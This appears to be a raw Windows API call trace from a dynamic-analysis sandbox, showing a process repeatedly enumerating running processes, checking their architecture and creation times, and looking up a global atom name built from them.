	[0090.129] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.129] CloseHandle (hObject=0x20c) returned 1
	[0090.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.130] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.130] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.130] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.131] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.131] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.131] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.131] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.131] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.131] CloseHandle (hObject=0x20c) returned 1
	[0090.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.132] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.132] CloseHandle (hObject=0x20c) returned 1
	[0090.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.203] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.203] CloseHandle (hObject=0x20c) returned 1
	[0090.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.204] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.204] CloseHandle (hObject=0x20c) returned 1
	[0090.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.204] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.204] CloseHandle (hObject=0x20c) returned 1
	[0090.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.204] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.204] CloseHandle (hObject=0x20c) returned 1
	[0090.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.204] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.204] CloseHandle (hObject=0x20c) returned 1
	[0090.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.205] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.205] CloseHandle (hObject=0x20c) returned 1
	[0090.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.205] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.205] CloseHandle (hObject=0x20c) returned 1
	[0090.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.205] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.205] CloseHandle (hObject=0x20c) returned 1
	[0090.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.205] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.205] CloseHandle (hObject=0x20c) returned 1
	[0090.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.205] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.205] CloseHandle (hObject=0x20c) returned 1
	[0090.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.206] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.206] CloseHandle (hObject=0x20c) returned 1
	[0090.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.206] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.206] CloseHandle (hObject=0x20c) returned 1
	[0090.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.206] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.206] CloseHandle (hObject=0x20c) returned 1
	[0090.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.206] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.206] CloseHandle (hObject=0x20c) returned 1
	[0090.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.206] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.206] CloseHandle (hObject=0x20c) returned 1
	[0090.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.206] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.206] CloseHandle (hObject=0x20c) returned 1
	[0090.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.207] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.207] CloseHandle (hObject=0x20c) returned 1
	[0090.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.207] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.207] CloseHandle (hObject=0x20c) returned 1
	[0090.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.207] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.207] CloseHandle (hObject=0x20c) returned 1
	[0090.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.207] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.207] CloseHandle (hObject=0x20c) returned 1
	[0090.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.208] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.208] CloseHandle (hObject=0x20c) returned 1
	[0090.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.208] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.208] CloseHandle (hObject=0x20c) returned 1
	[0090.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.208] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.208] CloseHandle (hObject=0x20c) returned 1
	[0090.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.208] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.208] CloseHandle (hObject=0x20c) returned 1
	[0090.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.208] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.208] CloseHandle (hObject=0x20c) returned 1
	[0090.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.209] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.209] CloseHandle (hObject=0x20c) returned 1
	[0090.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.209] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.209] CloseHandle (hObject=0x20c) returned 1
	[0090.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.209] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.209] CloseHandle (hObject=0x20c) returned 1
	[0090.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.209] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.209] CloseHandle (hObject=0x20c) returned 1
	[0090.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.209] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.209] CloseHandle (hObject=0x20c) returned 1
	[0090.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.209] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.210] CloseHandle (hObject=0x20c) returned 1
	[0090.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.210] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.210] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.210] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.210] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.210] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.211] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.211] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.211] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.211] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.211] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.211] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.211] CloseHandle (hObject=0x20c) returned 1
	[0090.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.212] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.212] CloseHandle (hObject=0x20c) returned 1
	[0090.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.296] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.296] CloseHandle (hObject=0x20c) returned 1
	[0090.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.297] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.297] CloseHandle (hObject=0x20c) returned 1
	[0090.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.297] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.297] CloseHandle (hObject=0x20c) returned 1
	[0090.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.297] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.297] CloseHandle (hObject=0x20c) returned 1
	[0090.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.297] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.297] CloseHandle (hObject=0x20c) returned 1
	[0090.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.297] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.297] CloseHandle (hObject=0x20c) returned 1
	[0090.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.298] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.298] CloseHandle (hObject=0x20c) returned 1
	[0090.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.298] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.298] CloseHandle (hObject=0x20c) returned 1
	[0090.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.298] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.298] CloseHandle (hObject=0x20c) returned 1
	[0090.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.298] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.298] CloseHandle (hObject=0x20c) returned 1
	[0090.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.298] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.298] CloseHandle (hObject=0x20c) returned 1
	[0090.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.299] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.299] CloseHandle (hObject=0x20c) returned 1
	[0090.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.299] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.299] CloseHandle (hObject=0x20c) returned 1
	[0090.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.299] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.299] CloseHandle (hObject=0x20c) returned 1
	[0090.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.299] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.299] CloseHandle (hObject=0x20c) returned 1
	[0090.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.299] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.299] CloseHandle (hObject=0x20c) returned 1
	[0090.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.300] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.300] CloseHandle (hObject=0x20c) returned 1
	[0090.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.300] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.300] CloseHandle (hObject=0x20c) returned 1
	[0090.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.300] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.300] CloseHandle (hObject=0x20c) returned 1
	[0090.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.300] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.300] CloseHandle (hObject=0x20c) returned 1
	[0090.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.300] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.300] CloseHandle (hObject=0x20c) returned 1
	[0090.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.301] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.301] CloseHandle (hObject=0x20c) returned 1
	[0090.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.301] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.301] CloseHandle (hObject=0x20c) returned 1
	[0090.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.301] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.301] CloseHandle (hObject=0x20c) returned 1
	[0090.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.301] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.301] CloseHandle (hObject=0x20c) returned 1
	[0090.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.301] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.301] CloseHandle (hObject=0x20c) returned 1
	[0090.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.301] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.301] CloseHandle (hObject=0x20c) returned 1
	[0090.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.302] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.302] CloseHandle (hObject=0x20c) returned 1
	[0090.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.302] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.302] CloseHandle (hObject=0x20c) returned 1
	[0090.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.302] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.302] CloseHandle (hObject=0x20c) returned 1
	[0090.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.302] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.302] CloseHandle (hObject=0x20c) returned 1
	[0090.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.303] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.303] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.303] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.303] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.303] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.303] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.303] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.304] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.304] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.304] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
